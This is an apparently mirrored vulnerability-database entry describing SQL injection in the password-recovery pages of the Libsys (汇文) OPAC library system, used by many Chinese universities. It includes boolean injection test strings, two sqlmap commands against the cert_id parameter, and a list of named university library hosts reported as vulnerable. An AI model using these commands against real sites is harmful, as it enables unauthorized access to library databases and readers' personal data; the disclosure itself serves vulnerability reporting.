汇文图书管理系统SQL注入

基本字段

漏洞编号：: SSV-95276

披露/发现时间：: 2014-11-20

提交时间：: 2014-11-20

漏洞等级：

漏洞类别：: 其他类型

影响组件：: Libsys

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-083581

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：大量高校在使用该系统，测试了多个版本，都存在同样的问题。 ### 详细说明：看了下你们用户列表中的高校，基本上都用的是4.5或5.0版本的，都有同样的问题，找回密码处存在注入。 [<img src="https://images.seebug.org/upload/201411/17130021d5e84091405bfb9f18183c46a6d72049.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/17130021d5e84091405bfb9f18183c46a6d72049.png) #1 OPAC V4.5 测试站点：http://210.27.80.82/reader/redr_mail.php [<img src="https://images.seebug.org/upload/201411/171300526f146449d0839c274b3e1adf9c344ae7.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/171300526f146449d0839c274b3e1adf9c344ae7.png) [<img src="https://images.seebug.org/upload/201411/171301009eaec2cda1ee9d8d106691873a55bf43.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/171301009eaec2cda1ee9d8d106691873a55bf43.png) 'or '1’=’1 时和 ‘or ‘1’=’2 时返回不同，此处明显是存在注入的，是布尔型盲注。拿出sqlmap跑跑，居然告诉我不能注入，不科学啊。反复修改参数试了几次，还是只能时间盲注，看来有时候神器也不好使。时间盲注就时间盲注吧，也比我自己动手快，尝试跑了下数据。 ``` Sqlmap -r 1.txt -p cert_id --dbms Oracle --level 3 ``` [<img src="https://images.seebug.org/upload/201411/17130218a4d9b7b387d9e215964eccc41e92223a.jpg" alt="图片4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/17130218a4d9b7b387d9e215964eccc41e92223a.jpg) [<img src="https://images.seebug.org/upload/201411/171302255e124430feed93825d05efa318e557d1.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/171302255e124430feed93825d05efa318e557d1.png) #2 OPAC V4.5 测试站点：http://opac.lib.ustc.edu.cn/reader/get_pwd.php [<img src="https://images.seebug.org/upload/201411/1713025761d057534ff0ff0950f9a660c5e83f65.png" alt="图片6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1713025761d057534ff0ff0950f9a660c5e83f65.png) 此处就真的只能时间盲注了。 ``` Sqlmap -r 2.txt -p cert_id --dbms Oracle --level 3 --technique T ``` [<img src="https://images.seebug.org/upload/201411/1713033506f6f788abd5a1f1b93f9e9046848797.jpg" alt="图片7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1713033506f6f788abd5a1f1b93f9e9046848797.jpg) [<img src="https://images.seebug.org/upload/201411/1713034145420419c163836b11d980f6d0383a19.png" alt="图片8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1713034145420419c163836b11d980f6d0383a19.png) ### 漏洞证明：测试过的其他案例： ``` http://210.27.80.82/reader/redr_mail.php http://opac.niit.edu.cn/reader/get_pwd.php http://mylib.cau.edu.cn/reader/get_pwd.php http://opac.forestpolice.net/reader/get_pwd.php http://opac.jsafc.net/reader/redr_mail.php http://opac.lib.xjtlu.edu.cn/reader/redr_mail.php http://202.119.185.6/reader/redr_mail.php ```

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-083581

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

汇文图书管理系统SQL注入

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定